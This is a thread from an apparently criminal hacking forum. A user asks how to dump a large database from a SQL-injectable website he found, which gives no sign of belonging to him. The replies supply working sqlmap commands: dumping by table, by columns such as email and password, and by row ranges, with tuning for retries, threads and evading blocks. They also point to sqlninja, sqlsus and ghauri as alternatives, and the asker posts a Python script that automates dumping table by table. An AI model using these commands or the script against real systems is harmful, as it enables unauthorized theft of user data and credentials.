• XSS.stack #1 – первый литературный журнал от юзеров форума

Data Exfil Issue with SQLMap

molotov477

(L3) cache
Пользователь
Регистрация
01.11.2022
Сообщения
182
Реакции
44
Гарант сделки
4
Hello, so I have a small query, so I found this vulnerable MySQL DB on a website, tested it manually and then used SQLMap to get more details of the database, there is one primary large database that I am interested in dumping, I listed the individual tables and then decided to go with --dump-all in order to dump the entire database, however there are some large tables with multiple columns whenever its turn for them to be dumped, either SQLMap crashes/ gets stuck or the connection breaks, I have tried increasing the timsec value, tried different techniques, but for some reason on those two large tables, I can't seem to dump them, what are my other options? Is there an alternative tool that can dump the database in a more stable manner, another feature in SQLMap that I can use or I might be missing?

Any help and guidance would be appreciated, thanks.

The command that I am using is
sqlmap -u "https://<target.com>\injection.php?id=1234" -p id --batch -D <databasename> --dump-all --random-agent --threads 10 --time-sec 10000 --technique=u


The response from sqlmap

Код:
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=1234 UNION ALL SELECT NULL,NULL,CONCAT(0x7178707871,0x54476d786d495070795750686b4e557155564d6277444a6857427466704b707a7167615877644476,0x7171766271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
 
Решение
Good evening, dear friend

If you're hitting issues with SQLMap crashing or getting stuck when dumping large tables, there are a few tweaks and alternative tools you can use to make the process smoother and more stable:

1. Optimize Sqlmap Usage
2. Increase Stability Parameters
3. Use Alternative Tools

Ex For Optimize Sqlmap :

First, tweak your Sqlmap command to target specific tables or columns incrementally. This reduces the load on the server and improves stability. Here are some approaches:

Instead of using --dump-all, specify the table name to dump it incrementally:
Bash:
sqlmap -u "https://<your.target.com>/injection.php?id=1234" -p id --batch -D <databasename> -T <tablename> --dump --random-agent --threads...
Пожалуйста, обратите внимание, что пользователь заблокирован
Without seeing the target it will be hard to give you the best answer, but consider dumping only the columns you need or dumping all of them, separately and then merge

--dump -C id,email,password
--dump -C id,firstname,lastname

Then

csvjoin -c id file1.csv file2.csv > merged_file.csv

Alternatively you can try the start and stop option

--start=1 --stop=1000
 
I have thought about individually dumping the tables as well but I was hoping to automate the process, another option I am thinking is writing a small script feeding the table name one after another.

I just found out about ghauri through the forum, so trying it out now and see it can perform better, otherwise I will go for individual tables.
 
Good evening, dear friend

If you're hitting issues with SQLMap crashing or getting stuck when dumping large tables, there are a few tweaks and alternative tools you can use to make the process smoother and more stable:

1. Optimize Sqlmap Usage
2. Increase Stability Parameters
3. Use Alternative Tools

Ex For Optimize Sqlmap :

First, tweak your Sqlmap command to target specific tables or columns incrementally. This reduces the load on the server and improves stability. Here are some approaches:

Instead of using --dump-all, specify the table name to dump it incrementally:
Bash:
sqlmap -u "https://<your.target.com>/injection.php?id=1234" -p id --batch -D <databasename> -T <tablename> --dump --random-agent --threads 10 --time-sec 10000 --technique=u

You can use Target Specific Columns

If certain tables have many columns, specify which columns to dump:
Bash:
sqlmap -u "https://<your-target.com>/injection.php?id=1234" -p id --batch -D <databasename> -T <tablename> -C "column1,column2,column3" --dump --random-agent --threads 10 --time-sec 10000 --technique=u

Or you can use Limit the Rows

Limit the number of rows dumped at a time using the --start and --stop options:

Bash:
sqlmap -u "https://<target.com>/injection.php?id=1234" -p id --batch -D <databasename> -T <tablename> --start=0 --stop=1000 --dump --random-agent --threads 10 --time-sec 10000 --technique=u

2 . Possible solutions for Increase Stability Parameters

Adjust parameters to make the connection more stable:

Decrease Threads​

High thread counts might be causing the connection to break. Reduce the number of threads:
Bash:
sqlmap -u "https://<YOUR-target.com>/injection.php?id=1234" -p id --batch -D <databasename> --dump-all --random-agent --threads 5 --time-sec 10000 --technique=u

Increase Retries

Increase the number of retries for failed requests:
Bash:
sqlmap -u "https://<target.com>/injection.php?id=1234" -p id --batch -D <databasename> --dump-all --random-agent --threads 10 --time-sec 10000 --retries 5 --technique=u

3 .Or you can use other tools that I will give you an example of below:

sqlninja

SQLNinja is another tool designed for exploiting SQL injection vulnerabilities and might offer more stability:

note : You can download Sqlninja from Github or its official site:
Bash:
sqlninja -u "https://<your-target.com>/injection.php?id=1234"

Another option is Sqlsus which is installed on Kali Linux and you can download it from its main site or install it on your Debian or Ubuntu server as follows:

apt install sqlsus

Bash:
sqlsus --url "https://<Your-target.com>/injection.php?id=1234"


And finally, if you don't succeed, you can try [- Manual Dumping -]

Again, if you have any questions, tell me so that I can help you

best regards
 
Решение
Thank you so much for a detailed response, I will try dumping the tables one by one and see if that works along with adding on the tweaks you have suggested in order to make it more stable.

I just downloaded Ghauri from it's github, I will see if that helps otherwise, I will try out SqlNinja or Sqlsus as well and if all else fails, I think your suggestion for limiting the useful columns and dumping them only would be the right way to go.

Once again, thank you so much for all your help!
 
Just a little update, after trying and messing around with a few different tools, I settled for a python script where it would take input from a file for tablename and I added a 10 second delay inbetween executing the dump command as to make sure my requests dont get blocked or anything.

I tried using Ghauri, a recommendation I picked up from older posts, but it was just too slow, even to list tables it took awfully long time, so I gave up on it.

Posting the script that I used on here in case it might help someone in future

Python:
import subprocess
import time

# Function to read table names from a file
def read_table_names(file_path):
    with open(file_path, 'r') as file:
        return [line.strip() for line in file]

# Function to run SQLMap command
def run_sqlmap(command, table_name):
    command = command.replace("-T ", f"-T {table_name}")
    subprocess.run(command, shell=True)

# Main function
def main():
    # SQLMap command for dumping data from a table
    sqlmap_command = "sqlmap -u http://example.com/index.php?id=1 -p id -D dbname -T --dump --threads 5 --time-sec 5 --timeout=500 --retries=5"
    
    # Path to the file containing table names
    table_names_file = "table_names.txt"
    
    # Read table names from file
    table_names = read_table_names(table_names_file)
    
    # Run SQLMap command for each table name with a delay
    for table_name in table_names:
        run_sqlmap(sqlmap_command, table_name)
        time.sleep(10)  # Adjust the delay time as needed (in seconds)

if __name__ == "__main__":
    main()
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх